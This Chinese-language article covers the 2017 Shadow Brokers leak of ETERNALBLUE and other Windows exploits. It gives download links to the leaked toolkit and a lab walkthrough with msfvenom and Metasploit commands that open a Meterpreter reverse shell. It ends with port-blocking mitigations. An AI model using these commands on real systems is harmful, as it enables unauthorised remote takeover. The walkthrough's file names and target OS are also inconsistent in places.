Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖大量的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用 Windows 服务器,这次事件影响力堪称网络大地震。 目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000(没错,古董也支持)、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。 故事还要从一年前说起,2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shadow Brokers” 还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,“Shadow Brokers” 预期的价格是 100 万比特币(价值接近5亿美金)。这一切听起来难以置信,以至于当时有不少安全专家对此事件保持怀疑态度,“Shadow Brokers” 的拍卖也因此一直没有成功。 北京时间 2017 年 4 月 14 日晚,“Shadow Brokers” 终于忍不住了,在推特上放出了他们当时保留的部分文件,解压密码是 “Reeeeeeeeeeeeeee”。
方程式ETERNALBLUE 下载地址 推特 https://yadi.sk/d/NJqzpqo_3GxZA4 github https://github.com/x0rz/EQGRP_Lost_in_Translation
Pyhthon环境配置 python-2.6.6.msi https://www.python.org/download/releases/2.6.6/ win32模块文件pywin32-221.win-amd64-py2.6.exe 链接: https://pan.baidu.com/s/1nu8KXPB 密码: hy7e
机器 攻击机器Windows 7:192.168.1.108 攻击机器Ubuntu :192.168.1.109 目标机器Windows 7 x64(没安装过SBM补丁的,并且关闭防火墙):192.168.1.113
详细操作视频
利用msf生成dll劫持文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=6566 -f dll > /opt/x.dll
将s.dll文件拷贝到windows2003的C盘目录下: 在msf下开启msfpaylod监听: use exploit/multi/handler set LHOST 192.168.1.109 set LPORT 6566 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
使用exp里执行dll,就可以看到test.dll 反弹给Ubuntu的shell了。
除 Windows 以外,“Shadow Brokers” 泄露的数据还显示方程式攻击了中东一些使用了 Swift 银行结算系统的银行。
缓解措施
所有 Windows 服务器、个人电脑,包括 XP/2003/Win7/Win8,Win 10 最好也不要漏过,全部使用防火墙过滤/关闭 137、139、445端口;对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。